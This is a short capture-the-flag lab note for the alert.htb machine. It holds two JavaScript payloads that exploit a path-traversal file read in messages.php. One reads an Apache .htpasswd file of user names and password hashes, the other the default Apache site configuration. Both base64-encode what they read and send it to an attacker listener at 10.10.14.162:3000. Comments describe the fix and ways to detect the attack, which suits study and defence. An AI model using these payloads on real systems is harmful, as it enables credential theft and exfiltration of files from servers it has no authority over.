Arbitrary File Read
Apache
Authorization File
// Lab note (alert.htb): demonstrates the arbitrary file read exposed through the
// `file` query parameter of messages.php. The value uses `../` segments to leave
// the intended directory and names an Apache .htpasswd file (basic-auth user
// names and password hashes), presumably belonging to the statistics.alert.htb site.
// NOTE(review): the server-side handler is not shown on this page. The usual fix is
// to resolve the requested path to its canonical form and reject anything outside
// an allow-listed directory, and to keep .htpasswd where the web application's
// file-serving code cannot read it.
var req = new XMLHttpRequest();
// Third argument `false` makes this request synchronous, so req.responseText is
// populated before the statements below run.
req.open('GET', 'http://alert.htb/messages.php?file=../../../../../var/www/statistics.alert.htb/.htpasswd', false);
req.send();
// Second request (asynchronous) forwards the response body, base64-encoded with
// btoa(), in the `content` query parameter to a listener at 10.10.14.162:3000.
// Detection: `../` sequences in the `file` parameter in web access logs, and
// browser-originated GET requests carrying long base64 query strings to an
// unfamiliar host and port.
var req2 = new XMLHttpRequest();
req2.open('GET', 'http://10.10.14.162:3000/?content=' + btoa(req.responseText),
true);
req2.send();
Default config file
// Lab note (alert.htb): same file-read primitive in messages.php, here pointed at
// /etc/apache2/sites-available/000-default.conf. That path is the default site
// definition on Debian-style Apache layouts; reading it can disclose virtual
// hosts, document roots and the locations of authentication files.
// NOTE(review): the server-side handler is not shown on this page. The fix belongs
// there: canonicalise the `file` value and serve only paths that stay inside the
// intended directory.
var req = new XMLHttpRequest();
// Third argument `false` makes this request synchronous, so req.responseText is
// populated before the statements below run.
req.open('GET', 'http://alert.htb/messages.php?file=../../../../../etc/apache2/sites-available/000-default.conf', false);
req.send();
// Second request (asynchronous) forwards the response body, base64-encoded with
// btoa(), in the `content` query parameter to a listener at 10.10.14.162:3000.
// Detection: requests to messages.php whose `file` value contains `../` or resolves
// under /etc, and outbound requests with large base64 query strings.
var req2 = new XMLHttpRequest();
req2.open('GET', 'http://10.10.14.162:3000/?content=' + btoa(req.responseText),
true);
req2.send();